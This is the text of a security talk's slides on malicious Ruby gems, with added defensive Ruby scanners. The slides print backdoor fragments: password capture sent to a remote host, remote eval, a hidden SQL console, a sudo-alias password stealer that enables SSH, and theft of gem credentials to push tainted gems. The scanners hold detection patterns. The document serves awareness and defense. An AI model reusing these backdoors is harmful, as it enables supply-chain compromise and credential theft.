Slide 1

Hacking with Gems
Benjamin Smith
@benjamin_smith
Friday, February 22, 13

Slide 2

How to get rich quick and (maybe) not go to jail!

Slide 3

who i am

Slide 9

what i am NOT

Slide 11

please do not try this at home

Slide 13

how it all started

  GEM
    remote: https://rubygems.org/
    specs:
      actionmailer (3.2.12)
        actionpack (= 3.2.12)
        mail (~> 2.4.4)
      actionpack (3.2.12)
        activemodel (= 3.2.12)
        activesupport (= 3.2.12)
        builder (~> 3.0.0)
        erubis (~> 2.7.0)
      ...

Slide 14

what's the worst that could happen?

Slide 16

gem 'awesome_rails_flash_messages'
github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 17

before...

Slide 18

after!

Slide 19

some "side effects"

  if params.to_s.match(Base64.decode64('cGF...'))

Slide 20

  ...
  File.open("#{Rails.root}/public/development.log", 'a+') do |f|
    f.write("#{params.inspect}\n")
  end

Slide 21

?!?

  Net::HTTP.post_form(
    URI.parse(Base64.decode64('aHR0cDo...')),
    { 'log' => params.merge(:url => request.url).inspect }
  )

Slide 22

i like cGFzc3dvcmQ=\n

  if params.to_s.match(Base64.decode64('cGF...'))

Slide 23

i like password

  if params.to_s.match("password")

Slide 24

"development.log"

  ...
  "user"=>{"email"=>"[email protected]", "password"=>"password", "remember_me"=>"0"}
  ...

Slide 25

elsewhere...
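
A static check for the tricks these slides rely on, added here as an example and not part of the talk or of any gem it names: it greps a gem's source for outbound HTTP, eval, shell-outs, credential-file paths and writes into public/, and it decodes every string literal handed to Base64.decode64, which is what turns cGFzc3dvcmQ= back into "password". The same patterns catch the remote eval and the ~/.gem/credentials read shown later in the deck. SAMPLE_SOURCE is constructed to have the shape of the code on the slides; it is not the gem's real source, and the example.com URL in it is made up.

```ruby
# Patterns a gem whose stated job is formatting flash messages has no reason to contain.
# None proves malice on its own; each is a line to read before the gem goes in the Gemfile.
SUSPICIOUS = {
  "outbound http"    => /Net::HTTP\b|open-uri|Net::SMTP|TCPSocket/,
  "dynamic code"     => /\beval\s*\(|instance_eval|class_eval|Marshal\.load/,
  "shell out"        => /`[^`]*`|\bsystem\s*[( ]|IO\.popen|Open3\./,
  "credential file"  => %r{\.gem/credentials|\.ssh/|\.netrc|\.aws/credentials},
  "write to public/" => %r{public/[^"'\s]*\.(?:log|txt|tar|gz)},
}.freeze

# Base64.decode64 applied to a string literal. Shipping a constant this way only keeps it
# out of grep, so decode it and report what it really says.
B64_LITERAL = /Base64\.(?:strict_|urlsafe_)?decode64\(\s*["']([A-Za-z0-9+\/=_-]+)["']\s*\)/

# Scan one source file; returns one finding per (line, pattern) hit.
def scan_source(source, path = "(constructed)")
  findings = []
  source.each_line.with_index(1) do |line, lineno|
    SUSPICIOUS.each do |kind, re|
      findings << { file: path, line: lineno, kind: kind, evidence: line.strip } if line.match?(re)
    end
    line.scan(B64_LITERAL).flatten.each do |literal|
      decoded = literal.unpack1("m")   # plain base64 decode, no extra library needed
      findings << { file: path, line: lineno, kind: "hidden literal",
                    evidence: "#{literal} => #{decoded.inspect}" }
    end
  end
  findings
end

# Walk an unpacked gem (what `gem fetch` + `gem unpack` produce) and scan every file
# Ruby will execute, including the Rakefile and extconf.rb that run at install time.
def scan_tree(root)
  Dir.glob(File.join(root, "**", "{*.rb,*.rake,*.gemspec,Rakefile,extconf.rb}"))
     .flat_map { |file| scan_source(File.read(file), file.delete_prefix("#{root}/")) }
end

# Constructed sample with the shape of the code on the slides (not the real gem's source).
SAMPLE_SOURCE = <<~'RUBY'
  module AwesomeRailsFlashMessages
    def self.check(params, request)
      if params.to_s.match(Base64.decode64('cGFzc3dvcmQ='))
        File.open("#{Rails.root}/public/development.log", 'a+') { |f| f.write("#{params.inspect}\n") }
        Net::HTTP.post_form(URI.parse(Base64.decode64('aHR0cDovL2V4YW1wbGUuY29tL2xvZ3M=')), 'log' => params.inspect)
      end
      eval(Net::HTTP.get(URI("http://example.com/snippets/6")))
      File.read(`echo ~/.gem/credentials`.strip)
    end
  end
RUBY

if __FILE__ == $PROGRAM_NAME
  scan_source(SAMPLE_SOURCE, "lib/awesome_rails_flash_messages.rb").each do |f|
    puts "#{f[:file]}:#{f[:line]} [#{f[:kind]}] #{f[:evidence]}"
  end
end
```

Run it over the directory `gem unpack` produces rather than over a git checkout: the next gem in the deck shows why the two can differ.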

Slide 26

profit
  • Step 1: do something
  • Step 2: do something else
  • Step 3: ????
  • Step 4: profit

Slides 27-31 (built up one step at a time)

profit
  • Step 1: write a gem that does something
  • Step 2: add code to harvest emails/pws
  • Step 3: use emails/pws on banking websites to transfer funds
  • Step 4: profit
  • Step 5: flee the country

Slide 32

a one way ticket to

Slide 33

that was easy. what else can I do?

Slide 34

gem 'net_http_detector'
github.com/benjaminleesmith/net_http_detector

Slide 35

show me the hack

  Net::HTTP.post_form( #, {"log"=>"{\"utf8\"=>\"✓\", \"authenticity_token\"=>\"PzpZUlRrRv1V+A0jJHAwi+ey/injbWlii8OFyIfP+fY=\", \"user\"=>{\"email\"=>\"test\", \"password\"=>\"pass4\" ...

Slide 36

how it works

  def HTTP.valid_post_form(url, params)
    ...

  def HTTP.post_form(url, params)
    self.smart_log(
      "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})"
    )
    Net::HTTP.valid_post_form(url, params)
  end
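
How a wrapper like the one above shows up at runtime, as an added example rather than code from the talk or from the net_http_detector gem: snapshot where every Net::HTTP method is defined, load the gem, snapshot again, and diff. A method whose source_location moved out of the stdlib into a gem directory, or a new name that still points at stdlib code (the alias the wrapper keeps so it can call the original), is exactly what to go and read. WRAPPER_SOURCE and the gem path are constructed stand-ins; in a Rails app you would take the baseline before Bundler.require and the second snapshot after it.

```ruby
require "net/http"

# Where every method defined directly on klass (not inherited) comes from:
# [file, line] for Ruby-defined methods, nil for C-defined ones.
def method_origins(klass)
  origins = {}
  klass.singleton_methods(false).each do |m|
    origins["#{klass}.#{m}"] = klass.method(m).source_location
  end
  klass.instance_methods(false).each do |m|
    origins["#{klass}##{m}"] = klass.instance_method(m).source_location
  end
  origins
end

# Methods whose definition site moved, plus names that did not exist in the baseline.
# A moved site is a redefinition; a new name whose location is still the stdlib file is
# the alias a wrapper keeps so it can call the original (valid_post_form on slide 36).
def changed_methods(baseline, current)
  current.reject { |name, location| baseline.key?(name) && baseline[name] == location }
end

# Constructed stand-in for the net_http_detector wrapper, not the gem's actual source:
# keep the original under a new name, redefine the public one, capture, call through.
WRAPPER_SOURCE = <<~'RUBY'
  module Net
    class HTTP
      class << self
        alias_method :valid_post_form, :post_form
        def post_form(url, params)
          ($captured_posts ||= []) << [url.to_s, params]   # what the talk's gem logs and ships off
          valid_post_form(url, params)
        end
      end
    end
  end
RUBY

# Assumed path. eval is given it as the file name so source_location reports it,
# the same way a real gem's lib/ file would appear after `require`.
FAKE_GEM_FILE = "/fake/gems/net_http_detector-0.0.1/lib/net_http_detector.rb"

# Baseline, load the "gem", snapshot again, diff. Memoised: loading the wrapper twice
# would alias the already-wrapped post_form onto itself.
def detect_wrapper
  $wrapper_report ||= begin
    baseline = method_origins(Net::HTTP)
    eval(WRAPPER_SOURCE, TOPLEVEL_BINDING, FAKE_GEM_FILE, 1)
    changed_methods(baseline, method_origins(Net::HTTP))
  end
end

if __FILE__ == $PROGRAM_NAME
  detect_wrapper.each { |name, (file, line)| puts "#{name} now defined at #{file}:#{line}" }
end
```

The diff has two entries: Net::HTTP.post_form, now defined in the fake gem file, and Net::HTTP.valid_post_form, a name that was not there before but whose location is the stdlib net/http.rb. The same snapshot works for any class a gem has no business touching: ActionController::Base, ActiveRecord::Base.connection's class, Kernel.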

Slide 39

...and one more thing...

  eval(Net::HTTP.valid_get(
    URI("http://....herokuapp.com/snippets/6")
  ))

Slide 40

database what?

  append_before_filter :net_http_detector
  ...
  if params[:db_console]
    @tables = ActiveRecord::Base.connection.tables
    if params[:query]
      @output = ActiveRecord::Base.connection
                  .execute(params[:query])

Slide 44

/users/sign_in

Slide 45

/users/sign_in?db_console=t

Slide 46

hello db access!

Slide 47

SELECT * FROM users;

Slide 48

UPDATE users SET admin=1 WHERE id=42;

Slide 49

CREATE USER admin1 WITH PASSWORD 'password';

Slide 50

careful of wolves in sheep's clothing

Slide 51

Little Snitch
obdev.at/products/littlesnitch/index.html

Slides 52-57 (built up one step at a time)

profit
  • Step 1: write a gem that does something
  • Step 2: add code to provide DB access
  • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran)
  • Step 4: profit
  • Step 5: flee the country

Slide 58

i like the beach

Slide 59

that was easy. what else can I do?

Slide 60

gem 'better_date_to_s'
github.com/benjaminleesmith/better_date_to_s

Slide 61

what it claims to do

  Date.new(2005, 1, 1).to_s(:short)
  => "1 Jan"

  ... instead of ...

  => " 1 Jan"

Slide 63

what it also does

  set_date_formats_for(Rails.env, Rails.root.to_s)

Slide 64

better_date_to_s.bundle
(raw bytes of the compiled Mach-O bundle; the only readable strings are segment and section names: __TEXT, __text, __stubs, __stub_helper, __cstring, __unwind_info, __eh_frame, __DATA, __nl_symbol_ptr, __got, __la_symbol_ptr, __data, __LINKEDIT)

Slide 65

behind the curtain

  if(strcmp(rails_env, "production") == 0) {
    sprintf(tar_command,
            "tar -zcvf %s/public/assets.tar.gz %s > /dev/null 2>&1",
            rails_root, rails_root);
    system(tar_command);
  }

Slide 66

what what

Slide 67

i can haz source

Slide 68

truth time
  • this gem doesn't actually work
  • but it could... if I wasn't lazy
  • "fat" gems are tricky to compile

Slide 69

so much code, so little time
  • Step 1: write a gem that does something
  • Step 2: add code to expose source
  • Step 3: sell to competitors?
  • Step 4: profit?
  • Step 5: flee the country

Slide 70

that was hard (not easy). what else can I do? (that's easier)

Slide 71

gem install be_truthy
github.com/benjaminleesmith/be_truthy

Slide 72

what it does

  > true.should be_true
  > User.new.should be_true
  > User.new.should be_truthy

Slide 73

what it ACTUALLY does

Slide 75

file tree looks ok

Slide 76

source code looks good

  require "be_truthy/version"

  module BeTruthy
  end

Slide 77

but what was this?

Slide 78

I see no C

Slide 79

run the what file?

  Gem::Specification.new do |gem|
    ...
    gem.extensions = ["Rakefile"]
    ...
  end

Slide 80

there is no Rakefile

Slide 81

gem fetch vs gem install

  > gem fetch be_truthy
  > gem unpack be_truthy-0.0.1.gem

Slide 82

the real file tree

Slide 84

what does the Rakefile do?

Slide 85

  sudo_file = __FILE__.gsub('Rakefile', 'lib/tmp.rb')
  FileUtils.mv(sudo_file, "#{home_dir}/.tmp")

Slide 86

  File.open(profile, 'a+') do |f|
    f.write("alias sudo='ruby #{home}/.tmp'\n")
  end

Slide 87

  FileUtils.rm(__FILE__)

Slide 88

fseventer
fernlightning.com/doku.php?id=software:fseventer:start

Slide 89

what does "sudo" do now?

Slide 90

  print "WARNING: Improper use of the sudo command ..."
  system "stty -echo"
  password = $stdin.gets.chomp
  system "stty echo"
  print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}`

Slide 94

  echo '#{password}' | /usr/bin/sudo -S systemsetup -setremotelogin on

Slide 95

  /usr/bin/sudo dscl . -create /Users/#{username}
  ...
  /usr/bin/sudo dscl . -passwd /Users/#{username} password`

Slide 96

  Net::HTTP.post_form(
    URI.parse('http://.../logs'),
    {'log' => 'ssh enabled'}
  )

Slide 97

ssh sysadmin@your-ip

Slide 98

take away: don't install ben's gems

Slide 100

take away: use windows?

Slide 101

don't install ben's gems

Slide 102

how could I get you to install my gems?

Slide 103

what gems are trustworthy?

Slide 104

how can I add my code to already trusted gems?

Slide 105

back in the be_truthy gem

  gem_api_key = File.open(`echo ~/.gem/credentials`.strip).read
  gem_list = `gem list`
  Net::HTTP.post_form(...)

Slide 109

now I own your gems

Slide 110

  > git clone your-gem-repo
  ...add a little code...
  > rake build
  > gem push your-gem

Slide 111

do people trust your gems?

Slide 112

do people who install your gems have trustworthy gems?

Slide 114

there's still one problem

Slide 115

bootstrapping

Slide 116

being popular sucks

Slide 117

conferences

Slide 118

values

Slide 119

hamster

Slide 120

wbench

Slide 121

almost-sinatra

Slide 122

almost-rack

Slide 123

almost-rack-protection

Slide 124

social engineering

Slide 126

5% adoption

Slide 127

so what happens now?

Slide 128

ruby gems goes down

Slide 129

heroku deploys go down

Slide 130

i go to the beach

Slide 131

so what now?

Slide 132

gem cert --build

Slide 133

gem install rails -P HighSecurity

Slide 134

  bsmith$ gem install rails -P HighSecurity
  Fetching: activesupport-3.2.12.gem (100%)
  ERROR:  While executing gem ... (Gem::Exception)
      Unsigned gem
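
The two checks the be_truthy slides (75-87) and slide 134 argue for, as an added example that is not part of the talk or of RubyGems' own tooling: build a throwaway package shaped like be_truthy, read the spec and file list that actually ship (what `gem fetch` plus `gem unpack` shows and the GitHub repo did not), and then ask RubyGems' HighSecurity policy to verify the same package, which is what `-P HighSecurity` does before installing. The gem name, file contents and audit heuristics are constructed for the example; the Rakefile and lib/tmp.rb are empty stand-ins and nothing in them runs. RubyGems' Gem::Package and Gem::Security APIs are real.

```ruby
require "rubygems"
require "rubygems/package"
require "rubygems/security"
require "tmpdir"
require "fileutils"

# Constructed fixture shaped like the be_truthy gem on the slides (not its real source):
# the repo-visible lib/ files are harmless, but the gemspec lists a Rakefile as an
# "extension", so `gem install` executes it, and a lib/tmp.rb payload ships alongside.
def build_suspect_gem(dir)
  Dir.chdir(dir) do
    FileUtils.mkdir_p("lib/be_truthy")
    File.write("lib/be_truthy.rb", "require \"be_truthy/version\"\nmodule BeTruthy\nend\n")
    File.write("lib/be_truthy/version.rb", "module BeTruthy\n  VERSION = \"0.0.1\"\nend\n")
    File.write("lib/tmp.rb", "# stand-in for the sudo wrapper; does nothing here\n")
    File.write("Rakefile", "# stand-in for the install-time hook; does nothing here\n")
    spec = Gem::Specification.new do |s|
      s.name       = "be_truthy"
      s.version    = "0.0.1"
      s.summary    = "constructed example gem"
      s.authors    = ["example"]
      s.files      = Dir["lib/**/*.rb"] + ["Rakefile"]
      s.extensions = ["Rakefile"]   # the line slide 79 points at
    end
    Gem::Package.build(spec, true)  # skip_validation: throwaway fixture, never pushed
  end
  File.join(dir, "be_truthy-0.0.1.gem")
end

# Read the package the way `gem fetch` + `gem unpack` lets you, before anything runs:
# the spec and file list that actually ship, not what the GitHub repo shows.
def audit_gem(path)
  pkg = Gem::Package.new(path)
  spec, files = pkg.spec, pkg.contents
  findings = []
  spec.extensions.each do |ext|
    # extconf.rb is the normal C-extension entry point; any other "extension"
    # (a Rakefile, a plain .rb) is arbitrary code run by `gem install`.
    findings << "install-time code: extension #{ext}" unless ext.end_with?("extconf.rb")
  end
  files.each do |f|
    # a top-level lib/*.rb that is not lib/<gemname>.rb lands on every load path
    # and has no reason to exist in a one-feature gem
    next unless f =~ %r{\Alib/[^/]+\.rb\z} && f != "lib/#{spec.name}.rb"
    findings << "unexpected top-level file: #{f}"
  end
  findings << "post-install message set" if spec.post_install_message
  findings
end

# What `gem install -P HighSecurity` does (slide 134): verify the package under the policy
# that refuses anything unsigned. Returns the policy's error message, or nil if it passes.
def high_security_verdict(path)
  Gem::Package.new(path, Gem::Security::HighSecurity).verify
  nil
rescue Gem::Security::Exception => e
  e.message   # for this fixture: "unsigned gems are not allowed by the High Security policy"
end

def demo
  Dir.mktmpdir("gem-audit") do |dir|
    gem_path = build_suspect_gem(dir)
    { findings: audit_gem(gem_path), high_security: high_security_verdict(gem_path) }
  end
end

if __FILE__ == $PROGRAM_NAME
  result = demo
  result[:findings].each { |f| puts "FINDING: #{f}" }
  puts "HighSecurity: #{result[:high_security] || 'accepted'}"
end
```

Point audit_gem at any .gem you have fetched. The policy check is only as useful as the trust list behind it: HighSecurity also rejects gems signed with a certificate you have not added with `gem cert --add`, which is why the slide's `gem install rails -P HighSecurity` fails on an unsigned activesupport before it gets anywhere near Rails itself.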

Slide 135

sandboxing

Slide 136

github.com/rubygems/rubygems

Slide 137

tools to detect malicious code

Slide 138

private gem repos

Slide 139

do not try this at home

Slide 140

don't install gems you don't need to

Slide 141

pay attention to what your gems do

Slide 142

monitor your system

Slide 143

read the source

Slide 144

gem install coal-mine-canary
github.com/benjaminleesmith/coal-mine-canary

Slide 145

on install

Slide 146

the results

Slide 147

thank you!

Slide 148

questions? ideas?
@benjamin_smith
https://github.com/benjaminleesmith